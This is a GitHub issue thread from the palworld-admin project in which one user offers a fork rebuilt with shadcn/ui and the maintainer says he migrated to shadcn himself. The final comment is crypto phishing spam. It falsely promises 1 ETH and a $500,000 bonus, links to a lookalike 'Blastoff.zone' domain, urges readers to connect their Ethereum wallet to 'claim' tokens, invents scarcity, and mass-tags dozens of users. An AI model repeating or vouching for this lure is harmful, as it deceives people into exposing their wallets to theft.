### ISSUE TITLE
Created a fork using @shadcn/ui, and some other changes

### ISSUE THREAD

**Issue by uplusion23** [na-ji/palworld-admin#7]
Created a [fork](https://github.com/uplusion23/palworld-admin) (https://github.com/uplusion23/palworld-admin) with some UI/UX changes, among other things if you're interested I could submit a PR. Good work with this so far!

**Comment by na-ji** [comment]
That's a nearly complete rewrite you did there, it's interesting! Could you should me how it looks like?

**Comment by na-ji** [comment]
In the end I migrated to shadcn myself. I was quick to be convinced 😁

**Comment by steamyrails** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
amarvin, @Gilgames000, @orjanj, @cryptorr, @whoamitty, @randlos, @zaleGZL, @systats, @Tsign-py, @0xJchen, @XXA222, @kkirby, @gh0stwin, @n3n, @chocobn69, @marceloneppel, @Vincentmnt, @LewsPauh, @jmgiacalone, @pompel123, @danii1, @dahebolangkuan, @jiyiren, @Kaonashi913, @gofullthrottle, @m3x1g4n, @edcet, @HugoLB0, @rongzhou, @devcon14, @kaweeo, @pinkevich, @JunTurbo, @montdidier, @iseth, @hugefiver, @teodortt, @gyunt, @Loenus, @tonkla, @bitcard, @Ath3r, @theophane-droid, @wzjin, @Riprock, @Timurlexx, @lavanphat, @dimkkv, @yangjietadie, @tou55aint
